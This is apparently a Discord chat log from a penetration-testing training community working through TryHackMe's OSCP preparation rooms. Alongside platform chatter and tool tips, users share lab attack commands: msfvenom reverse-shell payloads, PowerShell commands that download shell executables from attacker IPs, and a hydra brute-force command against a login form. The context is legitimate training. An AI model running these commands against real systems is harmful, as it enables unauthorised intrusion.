#offensive-pentesting-path

That always happens

people pwning the box in 10 mins because they found a vulnerability that wasn't supposed to be there

yes, but the problem is the unintended paths were so obvious it's strange they were not discovered on the testing phase

I don't personally see how HTB can make large amount of money

That could effect the testing phase

They make a lot of money via recruitment

Companies pay for talent

They have a huge list of users who have proven their ability

^

Might be something that can be implemented on thm

But the boxes are often not real life based

Yeah, we're going to trial a recruitment programme in the uk

What do they use for hosting? do they outsource?

Hosting?

What do you mean?

Companies and recruitment agencies pay them to get talent.

I think they use DO

@alpine peak I recently asked a recruiter why they used htb. They said that though it may not be the most realistic in terms of content, it does go a long way in finding people passionate and dedicated to improving in the area

The amount of VIP servers they run can't be cheap

They also got £1.3 million investment a few months ago

So yea that explains it

They get a lot of grants though

ive heard their infrastructure is on ESXI :))

I noticed that also lol

I was actually going to mention that

They still live in the dark ages

Yeah

When my chall got accepted, they didn't even notify me

That's annoying ^^

I found out when someone DMed me asking for hints

You made a challenge? @toxic temple

All it needed was an automated email at the least, telling you they're using your material

Yeah

Do they go by ranks? Because people sell writeups for active machines?

?

@spark iron when you submit you essentially sign an exclusivity deal

Yeah I heard

Like, as soon as you hit that submit button it might as well be theirs

Shame they dont compensate you, least you get credit?

At least you get credit***

For some lacking categories they might pay, but that was a small thing that I've no idea if it went anywhere

Eh, oh well. It's a good platform but like all, has its flaws

offsec's system works because of the large investment put into to access the labs, and that prevents stuff like selling writeups from happening, and offsec has a large legal team as well, When you make something like machines open to the public, it creates a blackmarket for answer to improve credibility like ranks

^^

https://hackers.attacked.me/DcILRSIE3NmZ.png

Yeah flag sharing is ridiculous in HTB

It lowers credibility in my eyes compared to something like offsec labs

I think the way TryHackMe is being built out, we should provide beginner level material and then custom harder weekly challenges. We will have a good mixture of independent challenges and walkthroughs.

My chall was one of the easiest that they've put out yet and I had omni's DMing me for help

Oh rihhtt

Omni might as well mean nothing at this point

Wait for real? @toxic temple

Then their system is a bit flawed

Iv met omni's that have never programmed before

Yeah

That's really interesting to hear

"Are you sure you're omni rank?"

Tbh I know a few omni who to this day I’m convinced flag shared for rank

He was

A massive flag dump for all boxes happens about once every 6 months or so

Yeah, if I was 100% serious about the challenges, I'd implement randomised flags

Once I focus on more advanced stuff for thm

Stuff like that just drops the credibility, that's why I am surprised companies use that for validation

I'll add it in

Its not just flag sharing, its the community, they give answers away to stop people from asking for hints over and over

The discord is something else asw

Oh right hm. I'm interested to see what they do this year

Growth and all

I reckon they're gonna push into the edu space

New features etc..

Perhaps migrating to cloud?

Yeah probably

Offsec is doing that

@toxic temple they already have, Uni event in a few months I think - If you are talking about HTB still

They're also picking up teachers to be "content delivery managers", whatever that means

I mean it's a good move - we're doing it with hackback

Oh yeah, Shawn went into thag

That*

ye

As long as ippsec is still making videos, than I like HTB

He set a meeting up with me, then never turned up and blanked all my emails.

It's fine, the school is saying that I did HackBack2 on the website when in reality I had quit at that point

Out of interest, what do you want to see more of on TryHackMe?

Less walkthrough rooms

Oh really?

More challenge type rooms?

Just for me personally

Yea

Ok noted.

The weekly challenge is going to be like that

I thought about making meta content

Like rooms on how to make rooms

We have a room guide coming out soon

That would be helpful

I don't think I'm experienced enough to really do that though

I think thats more a Linux/Windows thing

Like Basic system administration

I just tell people to go to Red Hat or Linux foundation for that

Oh ok, we look into developing a new pathway

For SysAdmin type stuff

Not sure how it would fit

Or if a Linux Basics pathway is needed

I would make that

Linux Basics?

Yea

Ooo

Noted.

Would have to properly map it out

https://training.linuxfoundation.org/certification/linux-foundation-certified-sysadmin-lfcs/

base it on that

takes notes

LFCS covers service configuration

very big deal compared to the others

I have to agree with zayotic on the less walkthroughs

Okay noted, I'll ensure the weekly challenge is less walkthroughy

Given the amount of messages in this channel this chat is very much a success lol

I'll consider making chats for each of our major paths

ngl, when I saw that there was a new path I got excited, until I realized that there's only one room that I haven't started yet

@topaz yoke please organise the server a bit. Everything just gets thrown under Text Channels though stuff like cyber-advent and oscp-path could easily have a folder to hold them

my ocd dies

I'm breaking that out once I'm back from work, I'm going to split it into a rooms category and a general category

Sweet ❤️

I had considered doing it last night but held off just to confirm this channel was going to be used

so hey, anyone have an issue with the "Using the nmap flag -n what will it not resolve?" answer not working?

lol nevermind. I can't type

Type Harder

Oh no, that's some inception-level emotes there.

not a bad start today 😄

Skynet done, now back to HackPark

Ey, amazing

hey just joined the OSCP learning path hope its worth it! Have to retake the exam next month

Welcome! @honest jackal

@honest jackal you gonna crush it

hope so... lost my nerves last time it was so embarassing xD

Sorry man :( but youve got the support of THM this time :) @honest jackal

Have a shibe of encouragement

And by that Pars mean, you gonna get it this time.

We got your back :+1:

@honest jackal Don't you worry, we will help you out.

^

thx all 😄

😄

How long does it usually take for writeups to be approved?

Depends on the room owner

that depends on the room creator

they approve each writeup

Ahh okay thanks

Okay, i've been stuck on this for about an hour and was hoping someone could provide some assistance. I am currently working on Hack Park, I have obtained shell and in the process of attempting to elevate my privileges.

I already created my payload using msfvenom, and when I am trying to download the .exe file from my box using the powershell, the file is no where to be seen?

powershell Invoke-WebRequest -Uri http://10.8.20.76/shell2.exe -Outfile sh222.exe

is the command I used, and on my kali box running the simplehttp server, I see the 200 response from the victim box for the shell file, yet the file is nowhere to be found. What is going on?

@foggy heath ​powershell "IEX(New-Object System.Net.WebClient).Downloadfile('http://10.10.10.10/shell.exe', 'shell.exe')"

ty, I will try this when I get a chance -- I think I killed my box.

@alpine peak Still didn't seem to work -- for this command, I don't even see a response on the tab running my http server. Before I was able to see 10.10.215.78 - - [27/Jan/2020 22:26:55] "GET /shell2.exe HTTP/1.1" 200

do you have write permissions to the directory?

🤦‍♂️

end me

Why

that's probably it -- thanks

I forgot to add IEX

@alpine peak Is there an easier way for me to test if I have write permissions in a directory instead of just mkdir text?

well Accesschk exist, but I don't think its default anymore with windows

Still could transfer the binary

And I think powershell has Get-Permissions

TY, i was able to get my shell file to be uploaded -- now I know, check for permissions for write @alpine peak

Hello all, i started the path and i noticed something wrong with this question in vulnversity. If we are talking about who is actually running the web server it's not the user that is supposedly the correct answer in my opinion (i may be wrong)

web server=/=server in this instance

web server is just whos running the web server service, in this case Apache

If I remember its asking for a user and not a service account

For the Jenkins room, I currently has a reverse shell, created my payload using msfvenom (exactly as instructed), set up my multihandler, was able to successfully move the created payload to my victim machine, but when I run it, there I don't get a shell on my listener while it's running? Any ideas on what might be the issue?

Sorry, I meant to say for the "Alfred" room

@foggy heath What command did you use to run the exe?

Start-Process "poc.exe"

what directory?

Ahh -- i'm running it from C:\Program Files (x86)\Jenkins\workspace\project>

are you the bruce user?

yes -- i'm guessing I need to move into a different directory

Try the desktop directory

Hmm, no luck~

Are you using nishang?

but I guess I should try looking around different directories. Well, I already used nishang to get my initial shell. In the steps it told me to create a msfvenom payload

which I did, I re-read everything to see if there were any typos

You don't have too, but its just easier using staged

ahh -- isee

What command did you use to download the exe

powershell "(New-Object System.Net.Webclient).Downloadfile('http://IP-address:80/poc.exe','poc.exe')"

I was able to see from my tab running the server the file was downloaded

additionally, I saw that the file was pulled onto my current directory

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o meterpreter.exe

did you use that command

yeah, that's exactly what I used (with the exception of the lport and the file name

ohhh

i set the payload to windows/x64/meterpreter/reverse_tcp

but I also set that same payload on my multihandler

atleast that was what was directed in the instructions

essentially this was the exact command given to generate the payload

msfvenom --platform windows -p windows/x64/meterpreter/reverse_tcp -a x64 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -i 3 -f exe -o [SHELL NAME].exe

Its useful if dealing with 64bit kernel exploits

which I think generate the correct payload as one of the questions asks me for the exact file size of the payload

I just systeminfo to make sure -- it machine is x64 so this payload should work against it.

I don't remember what I did

unless I am missing something~

That's fine -- i might need to hang it up for the night, i've been stuck at this part for almost good 3 hours now.

hold on

i breezed through the first steps but seem to be getting stuck here... Just to be sure, I need to setting my multi/handler to the same port I specified in my msfvenom payload

kk, i'll hold on

msfvenom -p windows/x64/meterpreter/reverse_https -f exe LHOST=10.10.10.10 LPORT=443 -o shell.exe

kk, I'll try making a payload that way

hmm, no dice

try that new command

this is strange

Yeah, i'm must be doing something wrong or have missed something small/simple .. my brain is a bit fried... maybe i'll see my mistake after some shuteye

yea

I created the new payload, adjusted my multi/handler appropriately, ran it

then executed the payload with the Start-Process file.exe command

but get nothing~

not in quotes?

sorry, I did both

in quotes first, then tried without

I would need to set my LPORT on my multi/handler as 443 correct?

yes

man... yeah, no clue what's going on. I even tried terminating/re-deploying the box thinking I missed something up the first time around

got back to the same step on the 2nd, fresh box

i've triple checked my commands/options in the payload, my IP configs, payload options~

@foggy heath I'm heading to work rn but I can DM you a little later?

@Ashu Is it okay if I DM you in about 6 hours? about to get some shuteye

been at this box since 9:30PST and it's past 1AM now~

Yep that's fine :))

Cool, thanks~ thanks @hasty sentinel and @alpine peak

night fellas

I finished Jenkins last night and yeah it’s easy to make a typo somewhere and not get a meterpreter back. I should have documented this box but: make sure your exploit is built for x64, that you’re using quotes in the right places and running your commands in the right shells

hello all,

hello all, i just start Vulnversity but i think there is an issue with deploy. I tried to deploy the machine multiple times and it shows message that the machine started but the machine never start !

After clicking deploy (or if it still says it is already deployed), try refreshing your page and see if its information is now showing up at the top?

after clicking deploy it shows message "Starting your machine.. please wait!" but nothing deployed. When i refresh the page then I'm able to click deploy again but unfortunately it doesn't deployed.

I just did a quick test and it deployed for me. When you refresh and click deploy again does it say it's already deployed or the "starting your machine" message again?

it shows the same message Starting your machine.. please wait!

it could be the browser

try with a different browser?

If I failed to ssh into a machine several times and it refuses my connetion from then on, is there a workout? Is there a way to figure out how long it might lock me out for, or if the lockout is permanent?

Possible to mask/change your IP?

ahh, thanks!

Is there possibly something wrong with the metasploit box? I seem to now be able to migrate process, or even use the webcam_list command?

I couldn’t do those either

Figured it was a problem with my metasploit framework though

webcam_list can be blocked

What you guys thought about oscp path

By doing and complete it can it guarantee you to pass the oscp exam ?

No

Nothing can guarantee OSCP

At the end of the day you're the one taking it, nobody else is gonna do it for you

Completing the path without help from any walkthrough could increase your chances

The exam is cut throat, can't figure it out on your own? You fail

What mean it give you the understanding of how the exam looks like as similar as the path

The closest you'll get to the exam is the offsec labs

The exam machines change all the time, What I do know is that the machines are designed specifically to make the attacker understand the exploit and be able to modify it to work for the machine, and to be able to google enough to understand how it works

The PWK labs are not at all like the exam

For example: if a vulnerability exist but a public exploit relies on a specific service to obtain RCE because thats the most common use, but they want you to analyze the info you already have and be able to use that vuln in another way to gather info you know for a fact exist on the machine already.

The path was developed with this in mind so that's why I said if you root them without any help because thats the closest simulation you will get

Yeah, I’m 66% done this path but the stuff you do only covers so much of the PWK syllabus

You have to use a lot of resources to "guarantee" a pass for the exam, not just this OSCP path

The path is for methodology building, thats what the PWK is for also

Yup, and it's done a good job at that so far 🙂

anyone else having connectivity issues?

#site-support @frail vine

@frail vine I think (if its the same user I'm talking to on Twitter), this is ok now

Ill add another OpenVPN VIP server in

Is the OpenVPN VIP server automatic or does one need to do something to be using that server?

@spark iron yeah it a me 🙂

I have a question : on oscp path challenge kenobi task 3 : why we connect using nc on port 21 , why using nc for this ftp port

you can interact with FTP servers through a command prompt

NC can sneak some files in a a bit if remote code if a shell is set up correct, there's a few HTB machines that offer that method I believe

I have no shame using walkthroughs though. At my level I need that instruction for a bit while I can work on getting the very basics of offense/defense.

I really wish there were more machines it labs to exercise Incident Handling/Response and Threat Intel. That's the route I want to end up at but a lot of these companies I've been able to talk to are looking for a hell of a lot of experience

Need help on hackpark task 4

I already create the shell using mafvenom and i have nc session on the machine

I cant upload the shell.exe to the machine

What command did u use?

• specify the path within the command @thin walrus

I can see the log in my simplehttpserver

But the file not uploaded when i type dir

fully specify the outpath

Hi, new to the server :)
I've started the OSCP PREPARATION path and noticed that "#5 What user was running the web server?" doesn't seem correct in the (question) statement. It means the user running the web server/service which is not the answer accepted as correct.

also make sure you have write privileges to the given location

or is this is a known "bug"?

I don't know the answer off the top of my head, but put what you think in ||here||

here being ||||

the answer 4 dots which is not the user running the web server 😉

it was the user for "#6 What is the user flag?"

I got the answer correct after some attempts but just think the question is stated incorrect for #5

@crimson flame i dont get what you mean

You can check the powershell command i did ,

Is this correct

powershell -c "Invoke-WebRequest -Uri 'http://<ip>/shell.exe' -OutFile C:\Windows\Temp\shell.exe"

not fully specifying the outfile-path can lead to some issues.
your shell could also be picked up by AV if the box has it

I linux there is no av and the shell is in my home directory

On the target machine, not yours.

193.168.1.3 is my ip local server , the target machine should not hv av ?

They're saying you need to specify the full path of where you want the shell.exe to be placed on the remote machine

Hence the "-OutFile C:\Windows\Temp\shell.exe"

Ok great its working now after i edit the command thanks for your help

hey all i posted another writeup in my series for the path

https://www.pwndefend.com/2020/02/01/tryhackme-review-part-3-circling-back/

I must have google the whole internet without luck, trying to find the (MS-xx-xxx) patch for a CVE but without luck

any pointers in the direction would be nice 🙂
solved

It’s in my blog @ www.pwndefend.com re CVE reference for the non metasploit one

I was looking at the wrong service 😬 but thx

i may be crazy but i can't see the oscp path under tryhackme.com/paths

it's there

for some reason i only see red/blue primer series like normal. nothing else is on the page

oh interesting. i had to leave the red/blue primer series to see the other paths to join one of them

anyone done HackPark? I'm at Task 4 and #4 but for some reason it's not triggering

anyone around?

have a question

Already figured out

again another question

anyone around

still no one?

@burnt walrus \o

hey

If you haven't figured it out yet

yea

What's up?

can I dm

or just spit it out here

Question is about?

pscp path ICE

oscp

ICE, Dark's room? I haven't done it to be honest.

dark pc yea

What's the question though?

I cant find the version of that thing

Ah, the first question?

Use ||nmap -sV -sC -A <ip>|| and analyze the output thoroughly. @burnt walrus

ahh yea

-A

ok ok

I will check it

thnx man

Sure do and let me know.

no its not giving out the details of the port

Then use that for specific port, is it 8080/8000?

@burnt walrus

done that

still nothing

Strange

Link of the room?

https://tryhackme.com/room/ice

is there a glitch?

Can you show the full output of it in DM? @burnt walrus

alright

hey everyone my latest OSCP path walkthrough is online! https://www.pwndefend.com/2020/02/02/try-hack-me-part-3-alfred/

I got it all but i left task number 2 in steel mountain action 2 , i know the file server and everything but the answer is wrong

Hn0s from rf?

@thin walrus yes, i had problems with task 2 in steel mountain too. The answer for this question can be found if you search up CVE number in CVE database, for example cve.mitre.org

yes

it's me

from rf

:S

@thin walrus

Where the new netsparker :p not yet sent me

Haha

lmao i won't send anyone anymore

give a thank to leechers 🙂

Lol

@bronze zenith thanks , i think they should fix some wrong typo

Sometime i notice there is thing not clear with the question

hey guys i am just starting to do the oscp prep path and i was wondering if any of you had advice on a note keeping tool.

I have suggestion since the path names is oscp the steps info and the hint and whatever there should not use metasploit , they should redo this path , most of the room i see picture and the use of metasploit

@devout violet use cherrynote

Its comes installed in kali linux

If that's Cherrytree you're meaning, then I second that. Best tool in the game

i was looking it up. can i move the notes i create on usb or any other method using cherry tree.

And you can find template online type in google cherrynote oscp template

Yes

FYI: i currently use keepnotes but moving the notes to another medium is kinda complicated

Depends on the format @devout violet

It can import from Keepnote, yes

joplin is pretty good too

You can import as anything most , there is option call tree then choice import

Node

Then you will find your option there

https://hackers.attacked.me/aHmXNshEu2Cb.png

I've not heard of that one @toxic temple. Does look pretty good, although I reckon Cherrytree is too ingrained for me to switch!

keepnotes currently ( as far as i know) only imports to HTML. i was looking for something along the lines of notepad or word. incase i wanted to move it.

thanks for the advice...

There is good script that scan and add to cherrytree automatically

Welcome

Tbh i really like cherrytree

but i haven't used it for a while.

Yes its good one i have create a good template for it

yeah

but it seems that joplin is also really good 🙂

Oh that's cool

but, i'm the only one who rarely uses notes and keep all in mind? ahahahaha

i only do those in real life works lmao

You have to put notes when you do ctf etc based on your writeup and understanding , one day you will fine it useful , it will save you time sometimes , also its make everything clear for each step

yeah i know well

that's why on real work, i do it

Speaking of notes, does anyone have some recommended note-taking tools they like? Rather than doing what I currently do with a directory with a notes file in it, wanting to look into something more useful for note-taking while practicing on boxes

I use Notion but everyone has their own preference. CherryTree and KeepNote seem to be the popular options

I suggest going through some rooms with a tool each and see which you like

Oh, guess I'll need to track down those rooms then!

cherrytree is my go to

as ESWAT mentioned there's a few different options

I think I saw someone using cherrytree before, might see how I like it

if ur a windows host user, onenote is good as well

you can use onenote from a web browser as well. I mention this as some companies use o365 to store customer data so it's a useful tool to get to know from an IRL perspective

hai all! Here's part 5 of my OSCP path writeups! https://www.pwndefend.com/2020/02/03/try-hack-me-part-5-game-zone/ hope its useful to some! :lightsaberpepe:

"Try upload a few file types to the server, what common extension seems to be blocked?"

How is this not guesswork?

@glass pine It's expecting you to try uploading "normal" file types. I reckon I can hazard a guess at which type it is -- probably in Vulnversity?
If that's the case, what file type would you first try to upload to get a reverse shell when you're presented with the options you have been?

@glass pine you would use automatin assisted appraoches

e.g. in burp suite you would use the intruder tool to load a range of tests to check extentions

it's not guesswork per say.

much the same as you might be injection testing, you would use a combo of wordlists to attack a form then investigate response codes etc.

you can script these with python or use a tool such as ZAP or BURP

Great next step after realising there's a problem ^^
Debatable whether it's the first thing you should do when you see a file upload though.

first thing...

i don't think the paths are intended as first thing

they are the route to r00t more than a teaching of the full testing process

Nah, as in, if you see a file upload, do you try uploading something first, or do you immediately open Burp and start testing it? I mean, I guess some people might -- it may even be the recommended course of action, but it's a bit overkill for answering that particular question.

Each to their own, I guess, but, whilst that's definitely the way forward for the next question, I wouldn't be reaching for it to see which common file extension is blocked.

As I said, it's totally up for debate as far as I'm concerned.

ok if i see a file upload the first thing i do is try and upload a non malicious file as per a normal user would

i would then upload a second one

non malicious

i would try and work out what the storage path was at the backend

i would see if I could link directly to it

i would then try and upload different extentions

so it's very near on the what i would do path

Exactly...
You would try to upload files first. When you realise that what you're trying to is blocked, then you would enumerate it to see what extensions are not blocked.
You wouldn't use Burpsuite before trying to upload files yourself.

Intruder for that right?

intruder or repeater

intruder for using word lists or itterators etc

i would normally try not to abuse an app before i knew how it worked as well

IRL ur on production systems

just spewing payloads isn't always a great idea 😄

Great work daniel

Just feedback , dont use metasploit in the writeup , we want to make this path better and to be following oscp style , its allow ones so i hope from the admin to take this feedback seriously

It's a per box restriction, not a one time usage thing.

So you can use it as many times as you like on one single target

Side note: this page is quite good for the major PWK exam talking points https://support.offensive-security.com/oscp-exam-guide/

@thin walrus you can use the handler as many times as you want. You can only just use an exploit module once etc.

if i've used a module it's likely because there wasn't a script based exploit 9soz can't remember as done lots of writeups :D)

in the PWK labs you can use MSF exploits and i try to show the routes without if they are available

(and thanks dude!)

Morning all! I've got another writeup posted on this path for SkyNet! https://www.pwndefend.com/2020/02/04/try-hack-me-part-6-rise-of-the-machines/

can anyone help me with blue

have a small thing to ask

ok got it no need

^^

Noice

Hello all... What can i do when my kali remote connection freezes ?

Don't select a language when it asks you

Just close the Windows

Its a known bug

Its on my to-do list to fix

I will fix it this week 🙂

i see thanks 😄

😄

Hi, Im on HackPark room, I have already get root access via a CVE however I would like to exploit the abnormal service, and Im not sure Im doing things righ :/

I have try to overwrite the binary but got a permission denied and I try to modify the registry key but without success, so am I in the good direction?

Finishing up Blue room, but no flag2. I have terminated/deployed 3 times and followed all steps to include upgrade to meterpeter, getsystem, etc but no flag2.txt. Pretty easy to find the others with "search -f flag* -r -d"...and i see the flag2.lnk which shows actual location...but its not there. Anyone else having this issue? I even checked the write-ups and they confirm the location...but its not there after 3 reboots. Any advice from anyone? Can someone at TryHackMe confirm this room is still setup correctly or perhaps provide advice?

@hushed bluff try it one more time. If it still isn't there (and you've double checked the writeups) let me know and I'll grab it for you since you've clearly learned the concept of what I was going for

hey anyone else get stuck cracking the password on Blue? I have it cracked i think but it's not being accepted. Anyone wanna throw a hint my way? I'm about at my whits end (very new)

@topaz yoke Thank you, I will run through again...actually its not been a bad experience repeating, I am getting reps on msf!

@tardy basalt I used hashcat, since john did not work right away.

with the rockyou.txt wordlist

yeah that's what I'm using. Did you get a hex result and have to convert to ascii?

@tardy basalt Let me DM you with some hints.

cool

practice is always good ❤️ @hushed bluff

much appreciated

learned a lot just now. Thanks dude!

hello guys... those who did hackpark i have a small issue on the privesc exploit can i have a nudge plz ?

im still stuck on the hackpark hydra part

if anyone could give me a nudge 🙂

anyone around?

have a question in Blue regarding flag2 and flag3

guess will move on till someone can answer it

@burnt walrus if you still need help dm

@spark iron you online?

yea

Skidy is actually an extremely sophisticated piece of AI technology who is always online

lol

can I dm?

Just @ people and post your question

this isnt HTB where help is kept secret in the DMs

We like to keep Q & A in the discord so any other people that have your issue can reference the solution

Although don't post any flags, passwords, etc. Or at least keep spoilers in the spoiler tags.

Anyone else find 11 ports open in Kenobi? The correct answer is less, but after running the scan twice I still get 11.

wow 11?

i didnt get that much

anyone doing the hydra part?

ran in to a problem need to verify

@burnt walrus What room are you using hydra?

@hushed bluff Do any of the ports show as "filtered"?

@hushed bluff i guess its 4

hackpark

@fleet wedge Thanks for following up. I use --open to keep the results clean. When I went back to look at the hint, I believe the intent was to not specify all ports (-p-) and let nmap default to top 1000. I ran -p- and got 11, but the correct amount for the question is all ports below 1000, or standard services.

No worries, moving on.

good for you that you used -p- command, that's the best practice way to scan imo

you never know when you miss an important port only because you leave nmap default settings to do the work

@burnt walrus I am not there yet, but have used hydra before, what is your question and I try to help

I was wondering

im trying to crack weblogin

but the command is giving error

is it a GET or a POST...did you review the request/response in Burp Suite?

yea post

hydra syntax might be a pain in the ass if you don't have experience with it

totally agree

i agree with that

it is a pain

I have tried it in different ways

you can share the command here and we will try to help you with it

hydra -l admin -P /usr/share/wordlists/rockyou.txt http://10.10.12.188 http-post-form "/Account/login.aspx?ReturnURL=%2fadmin%2f:UserName=^USER^Password=^PASS^:S=logout" -vV -f

so this is the command now Im using

its attempting now

this is gonna take a long time isnt it

oh well didnt work

perhaps drop the url encoding around admin

it should be /admin/

right?

hmm

Ok, just finished kenobi...but had to use someone's writeup from PWNDEFEND.com to complete the final section since I could not understand based on the room directions...I had never used "strings" so the wording and screenshot did not connect until later. My question is: if there are two "curl" binaries (the normal one at /usr/bin/curl, and the one I created in /tmp...which is really /bin/sh) and both are in PATH...how do I know which one will execute?

Is it because I ran /usr/bin/menu from /tmp? I guess this is a question of the logic of PATH and how binaries are executed.

@burnt walrus https://null-byte.wonderhowto.com/how-to/hack-like-pro-crack-online-web-form-passwords-with-thc-hydra-burp-suite-0160643/

kali > hydra -L <username list> -p <password list> <IP Address> <form parameters><failed login message>

Working on HackPark and looks like there is one URL parameter and 5 other parameters in the body of the POST request that should be used in the <form parameters> section.

thnx @hushed bluff

@hushed bluff doesnt work like that. I have figured it out. thnx for all the help

anyone have issues running powerup on steel mountain?

anyone give e a hand with dailt bugle?

its really slow

with SQLi

had it working fine yesterday but couldnt find the hash anywhere!

65 pts after 10 hours. I should have done the lab report 😦

If you're still needing a hand @dusky dust, feel free to DM me with the command you're using.
Currently in the middle of a write-up for that room as well, so hopefully that will be out soon too

better than school

any guidance on daily bugle? i'm stuck where others are as well with apache shell. saw the chatter today about using linpeas over linenum, but didn't manage to find anything new with it

@wispy jacinth DM me if you're after a hand. If you'd prefer to trial the write-up I'm in the final stages of publishing, that's an option too

sure, if you've got something you can point to, i'll take a look

been working on it for days now in between taking breaks and thinking through stuff

That's fair. Getting user is a pain.
Gimme ten minutes to get the images in and press the publish button 👍

i wouldn't normally have worked to a room this high in difficulty yet, but it's in the oscp path after a handful of easy rooms with a description that remarks I should be able to do it after working through the others

maybe after some help with next steps, i'll better understand what I was supposed to have learned from the previous boxes in that part of the oscp-path to be able to tackle this room. for now though, i'm struggling connecting the dots

To be honest, this step is one you're probably going to kick yourself over. There's no big "hacking" concept you're missing. It's literally just down to closer enumeration.

yeah, just take more time, read. Might be a little tedious, but youll get there

dang, not what i wanted to hear. i wanted to hear how it required writing custom c to overflow a buffer in vestigial code from '92

Hehe. Nope -- no such luck I'm afraid. Here's a hint though (without spoiling it totally) ||take a look in /var/www/html -- the webserver has something to offer||

ok, i think i may know what you're referring to

and i've already got that string

but...that's just for the backend?

Is it though? Is it really? 😁

There's a lesson to be learnt here: don't reuse your passwords...

i guess i made a poor assumption there

i've been sitting here for an hour trying to find privesc vulns in that version of the backend ...

Hehe - nah, not at all. To be fair, the complexity of that password makes it unlikely that it's been reused. You can't be faulted for not jumping to that conclusion. I think that's an issue that's already been raised with the admins

actually, wait, that's not true. i did try to ssh in as root with that pass and it didn't work

Yeah, it's not the root pass

try it other places

Its better to enumerate with width before going down rabbit holes

If it's any consolation (and this is testament to exactly how tired I am) -- not only did I not save one of the screenshots I took, I subconsciously got around the hole in my numbered image sequence by saving the next one twice...

dangit, well, i suppose this could be somewhat realisic

there's definitely a lesson here for me

77.5 with 8 hours to go

@wispy jacinth I'm assuming you'll be fine from here, but this is a link to the write-up should you need it: https://muirlandoracle.co.uk/2020/02/08/daily-bugle-write-up/

i just finished escalating to root, woohoo

@chrome valve writeup looks good and mostly what I did. i didn't know quite what table to use with sqlmap, so i had more steps in there trying to determine that

also had issue with the gtfobins like you wrote about

Good to know it wasn't just me having annoyances with that privesc. It's easy enough to do -- just can't be automated for some reason.

i found a helpful medium article that walked through installing fpm and using that to build a reverse shell using /dev/tcp/ip/port --> rpm

Yeah, I looked at that on gtfobins and basically decided it was too much work 😄

thank you for the guidance and the good writeup

No problem, and thanks!

tfw the description says to attempt the daily bugle in an hour but I took a week...

All good practice though!

Exam done… but I’m too caffeinated to fall asleep and too lazy to polish my report 🤷

@chrome valve great write up bro! I learnt a new tool from that CMSeek which is cool, I used joomscan, well, first of all I tried to manually find the version, which I did. Then j used joomscan but I like a all in one CMSeek offers.

Also how did you get gtfobins in a terminal like that I have always got it up in a browser! Haha

@chrome valve ayy you got your writeup out, nice!

@keen iris Took me until 4AM, then another hour and a half to get the VM finished to include that new vulnerability, but so worth it!

@dense gale Thanks! I do like CMSeeK
Getting gtfobins into the terminal is actually a tool from our very own @autumn nova, so full credit to him for that. It's in his github, here: https://github.com/mzfr/gtfo

Awesome man thank you so much!!

Wish I knew about that yesterday 😅

@real sandal The exploit, the Write-up, or the terminal gfobins? 😄

Terminal gtfobins/lolbas

I already had too many browser tabs open

Hehe -- it's a great tool

Hi all
I get a very unstable shell when I replace the ASCService.exe for Advanced System. Care service
It is on the Steel Mountain room

You need to spawn a new shell

So when the shell loads have another shell prepped to fire

You can see that isn’t he wrote up I did I think

Hmmm

I can’t find my write up lol

Maybe I have another to publish 😱😂😂😂

@real sandal @chrome valve planning to add the option to search exploit-db in that tool

Even though there already exists searchsploit

But might be helpful to just have one tool for all of that

Hmm the issue for me is that searchsploit is very much in my muscle memory at this point, unless there was an alternative that improved the annoying parts of searchsploit

ie: be able to download files by referencing the number in the result list, like Metasploit, instead of having to copy the EDB path

You could always set yourself a challenge to make a script that does that using awk or something

That could be cool @autumn nova! Would that be using the searchsploit local files or just doing it online? Could be useful if it could tell us if we already have the file downloaded locally.

Well searchsploit have like whole db so it just search locally

Mine might just keep a copy of the CSV fils that have the record of vulns and with that it would give the URL to the exploit

But yeah adding a download option won't be hard

Yeah, exactly!
Out of curiosity, would you be able to search the remote one, but also check if the file already exists locally in the searchsploit db?

Core concept would be easy to do local searches. However, it wouldn’t be too difficult to provide remote searches

Should definitely be possibly, just in terms of how @autumn nova wanted it to operate.

Hi All, for the Alfred box, the meterpreter shell is uploaded to the host for the shell upgrade. But the Start-Process "shell.exe" does not pop me a shell in the msfconsole handler. Tried to listen on netcat as well, no luck. Can someone please help me out 😳

hmm im stuck there too

anyone around to give me a nudge on that

hello all i am looking for a binary exploit for this issue MS16-032

can anyone help me

?

Anyone around to discuss hackpark?

The priv esc mainly

@deft gale @burnt walrus dm if ur still stuck on that part

@true quiver your everywhere

my goal is world domination

anyone can help me with hackpark?

Anyone that finished brainstorm able to chat?

can you just ask your questions?

🙂

100% okay to share knowledge and help eachother in this discord

do not be afraid to not ask questions!

to*

I’ll try. I’ve been using wine and ollydbg combo to reverse engineer the .exe on my kali box. I’m able to overflow the buffer and have control over eip. The room seems to hint that the .exe was compiled with ASLR and DEP protections but when I try to confirm by running the binary through a few tools, all say that aslr and dep are not set.

Is there a standard way to confirm this on a Linux os?

The reason I’m trying to check is that I have set up my payload to include a nop sled and shell code trying to see if I can execute the shell code right on the stack. When I run this through the debugger, the nop sled, shell code, and eip overwrite get set up correctly but when the _Overflow function returns (with the overwritten eip) the stack section that had my shell code gets overwritten with a bunch of \x00s which makes no sense to me

have got root.txt on hackpark but have a question on whether it was the intended way if anyone is about

anyone around?

this is the problem Im facing in hackpark

can anyone give me a solution

ok no need got it

is there a stability issue on Hackpark? the server keeps down and up

on hackpark i think i ended up using a c2 😉

but i think you can get round that by using the full path on the outpath paramater

gang apologies i haz 2 moar writeups i didn't post

hackpack and the mr robot one

i need to edit them and write them into blogs not just notes so they won't be out this week

on hackpark i think i ended up using a c2 😉
@frail vine what c2 you mean

i might have used covenant C2 or POSH c2

For post exploitation?

You gota make a short video for covenant c2 introduction many people dont know

yeah ok

empire 3.1 is ok as well 🙂

sometimes u need a tool that is proxy aware

metasploit shells aren't proxy aware

so u can't use them in non routed/adjacent network positions

PWK got updated https://www.offensive-security.com/pwk-oscp/

Working on machines for the updated syllabus

OSCP course + lab updated !

Finally some Active DIrectory!

yep sadly it takes up to 3 business days to get the content.... So bought the upgrade but have not gotten it yet

oof looks like its 5 days for people buying now

Looks like there's a lot of excitement about the new PWK. There's a lot of really cool stuff on the syllabus :)

Guys i need your suggestion planning to buy subscription for tryhackme and start oscp path how is the course content in tryhackme

yeah, that's a good idea! My advice would be to complete couple free rooms beforehand (for example RP: Nmap and Metasploit) so you have a basis for your studies. But all in all, the path is structured in a way that you start from step-by-step walkthroughs and end up with OSCP like rooms

